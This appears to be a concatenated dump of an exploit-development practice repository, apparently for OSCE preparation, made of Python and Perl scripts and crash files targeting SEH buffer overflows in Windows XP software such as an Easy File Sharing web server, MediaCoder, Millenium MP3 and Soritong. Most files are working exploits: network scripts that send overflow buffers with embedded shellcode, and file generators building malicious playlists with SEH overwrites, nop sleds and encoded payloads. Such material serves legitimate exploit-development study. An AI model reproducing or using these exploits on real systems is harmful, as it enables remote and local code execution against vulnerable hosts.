"\x98\x97\x01\x10" 24 | 25 | buff+= "\x90"*19 26 | 27 | # calc.exe 28 | # Bad Characters: \x20 \x2f \x5c 29 | shellcode = ( 30 | "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 31 | "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 32 | "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" 33 | "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 34 | "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" 35 | "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" 36 | "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" 
37 | "\x1c\x39\xbd" 38 | ) 39 | buff+= shellcode 40 | 41 | buff+= "\x90"*7 42 | 43 | buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) 44 | 45 | # GET 46 | a.send("GET " + buff + " HTTP/1.0\r\n\r\n") 47 | 48 | a.close() 49 | 50 | print "Done..." 51 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/easyfilesharing_webserver/easyfilesharing_shellcode_calc_head.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | 3 | import socket 4 | import sys 5 | 6 | host = str(sys.argv[1]) 7 | port = int(sys.argv[2]) 8 | 9 | a = socket.socket() 10 | 11 | print "Connecting to: " + host + ":" + str(port) 12 | a.connect((host,port)) 13 | 14 | entire=4500 15 | 16 | # Junk 17 | buff = "A"*4061 18 | 19 | # Next SEH 20 | buff+= "\xeb\x0A\x90\x90" 21 | 22 | # pop pop ret 23 | buff+= "\x98\x97\x01\x10" 24 | 25 | buff+= "\x90"*19 26 | 27 | # calc.exe 28 | # Bad Characters: \x20 \x2f \x5c 29 | shellcode = ( 30 | "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 31 | "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 32 | "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" 33 | "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 34 | "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" 35 | "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" 36 | "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" 37 | "\x1c\x39\xbd" 38 | ) 39 | buff+= shellcode 40 | 41 | buff+= "\x90"*7 42 | 43 | buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) 44 | 45 | # HEAD 46 | a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n") 47 | 48 | a.close() 49 | 50 | print "Done..." 
-------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/foo.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/foo.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/mediacoder_b_takeover.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | buff = "http:// " 4 | buff += "A"*776 5 | buff += "B"*4 6 | buff += "C"*1000 7 | 8 | fo = open("foo.m3u", "wb") 9 | fo.write (buff) 10 | fo.close() 11 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/mediacoder_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | buff = "http:// " 4 | buff += "A" * 1000 5 | 6 | fo = open("foo.m3u", "wb") 7 | fo.write (buff) 8 | fo.close() -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/mediacoder_eip_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | buff = "http:// " 4 | buff += 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9" 5 | 6 | fo = open("foo.m3u", "wb") 7 | fo.write (buff) 8 | fo.close() 9 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/mediacoder_shellcode_calc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 4 | "\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e" 5 | 
"\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb" 6 | "\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a" 7 | "\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b" 8 | "\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b" 9 | "\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32" 10 | "\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0" 11 | "\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d" 12 | "\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad" 13 | "\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85" 14 | "\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d" 15 | "\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1" 16 | "\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd" 17 | "\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3") 18 | 19 | 20 | seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll 21 | nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode 22 | nop_sled = "\x90" * 14 23 | 24 | buff = "http:// " 25 | buff += "A" * 776 26 | buff += nseh 27 | buff += seh 28 | buff += nop_sled 29 | buff += shellcode 30 | buff += "D" * (4216 - (len(shellcode + nop_sled))) 31 | fo = open("foo.m3u", "wb") 32 | fo.write (buff) 33 | fo.close() 34 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $sploitfile="c0d3r.mpf"; 4 | 5 | my $sploitfile="c0d3r.mpf"; 6 | my $junk = "http://"; 7 | $junk=$junk."A"x5000; 8 | my $payload=$junk; 9 | print " [+] Writing exploit file $sploitfile\n"; 10 | open (myfile,">$sploitfile"); 11 | print myfile $payload;close (myfile); 12 | print " [+] File written\n"; 13 | print " [+] " . length($payload)." 
bytes\n"; 14 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_eip_b_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $totalsize=5005; 4 | my $sploitfile="c0d3r.mpf"; 5 | my $junk = "http://"; 6 | $junk=$junk."A" x 4105; 7 | my $nseh="BBBB"; 8 | my $seh="CCCC"; 9 | my $shellcode="D"x($totalsize-length($junk.$nseh.$seh)); 10 | my $payload=$junk.$nseh.$seh.$shellcode; 11 | print " [+] Writing exploit file $sploitfile\n"; 12 | open (myfile,">$sploitfile"); 13 | print myfile $payload;close (myfile); 14 | print " [+] File written\n"; 15 | print " [+] " . length($payload)." bytes\n"; 16 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_popx2ret_confirm_location_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $totalsize=5005; 4 | my $sploitfile="c0d3r.mpf"; 5 | my $junk = "http://"; 6 | $junk=$junk."A" x 4105; 7 | my $nseh="\xcc\xcc\xcc\xcc"; #breakpoint, sploit should stop here 8 | my $seh=pack('V',0x76C37AAD); 9 | my $shellcode="A123456789B123456789C123456789"; 10 | my $junk2 = "D" x ($totalsize-length($junk.$nseh.$seh.$shellcode)); 11 | my $payload=$junk.$nseh.$seh.$shellcode.$junk2; 12 | print " [+] Writing exploit file $sploitfile\n"; 13 | open (myfile,">$sploitfile"); 14 | print myfile $payload;close (myfile); 15 | print " [+] File written\n"; 16 | print " [+] " . length($payload)." 
bytes\n"; 17 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_popx2ret_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $totalsize=5005; 4 | my $sploitfile="c0d3r.mpf"; 5 | my $junk = "http://"; 6 | $junk=$junk."A" x 4105; 7 | my $nseh="\xcc\xcc\xcc\xcc"; #breakpoint, sploit should stop here 8 | my $seh=pack('V',0x76C37AAD); 9 | my $shellcode="D"x($totalsize-length($junk.$nseh.$seh)); 10 | my $payload=$junk.$nseh.$seh.$shellcode; 11 | print " [+] Writing exploit file $sploitfile\n"; 12 | open (myfile,">$sploitfile"); 13 | print myfile $payload;close (myfile); 14 | print " [+] File written\n"; 15 | print " [+] " . length($payload)." bytes\n"; 16 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_popx2ret_smalljump.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $totalsize=5005; 4 | my $sploitfile="c0d3r.mpf"; 5 | my $junk = "http://"; 6 | $junk=$junk."A" x 4105; 7 | my $nseh="\xeb\x1e\x90\x90"; #breakpoint, sploit should stop here 8 | my $seh=pack('V',0x76C37AAD); 9 | my $nops="\x90" x 24; 10 | my $shellcode="\xcc\xcc\xcc\xcc"; 11 | my $junk2 = "D" x ($totalsize-length($junk.$nseh.$seh.$nops.$shellcode)); 12 | my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2; 13 | print " [+] Writing exploit file $sploitfile\n"; 14 | open (myfile,">$sploitfile"); 15 | print myfile $payload;close (myfile); 16 | print " [+] File written\n"; 17 | print " [+] " . length($payload)." 
bytes\n"; 18 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_shellcode.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $totalsize=5005; 4 | my $sploitfile="c0d3r.mpf"; 5 | my $junk = "http://"; 6 | $junk=$junk."A" x 4105; 7 | my $nseh="\xeb\x1e\x90\x90"; #jump 30 bytes 8 | my $seh=pack('V',0x1002083D); #pop pop ret from "xaudio".dll 9 | my $nops="\x90" x 24; 10 | my $shellcode= "\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" . 11 | "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . 12 | "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . 13 | "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . 14 | "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" . 15 | "\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" . 16 | "\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" . 17 | "\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" . 18 | "\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" . 19 | "\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" . 20 | "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" . 21 | "\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" . 22 | "\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" . 23 | "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" . 24 | "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" . 25 | "\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" . 26 | "\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" . 27 | "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" . 28 | "\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" . 29 | "\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" . 30 | "\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" . 
31 | "\x31\x42\x4c\x45\x33\x45\x50\x41\x41"; 32 | 33 | my $junk2 = "D" x ($totalsize-length($junk.$nseh.$seh.$nops.$shellcode)); 34 | my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2; 35 | print " [+] Writing exploit file $sploitfile\n"; 36 | open (myfile,">$sploitfile"); 37 | print myfile $payload;close (myfile); 38 | print " [+] File written\n"; 39 | print " [+] " . length($payload)." bytes\n"; 40 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/not_completed/easyrmtomp3/corelantutpart-2/test1.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/not_completed/easyrmtomp3/corelantutpart-2/test1.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/not_completed/fuzzysec3/div1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -w 2 | 3 | filename="evil.plf" 4 | 5 | buffer = "A"*2000 6 | 7 | textfile = open(filename, 'w') 8 | textfile.write(buffer) 9 | textfile.close() 10 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/soritong_mp3_player_1.0/sori_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | ################################################### 4 | #Soritong MP# Player 1.0 Universal Local BoF (SEH)# 5 | ###########https://github.com/jacobforer########### 6 | ################################################### 7 | 8 | $uitxt = "ui.txt"; 9 | 10 | my $junk = "A" x 1000; 11 | 12 | open(myfile,">$uitxt") ; 13 | print myfile $junk; 14 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/soritong_mp3_player_1.0/ui.txt: 
-------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7C
l8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/tomabo_SEH_nseh_overwrite.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/tomabo_SEH_nseh_overwrite.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/tomabo_SEH_nseh_ppr_badchars.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/tomabo_SEH_nseh_ppr_badchars.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/tomabo_eip_crash.m3u: -------------------------------------------------------------------------------- 1 | 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2C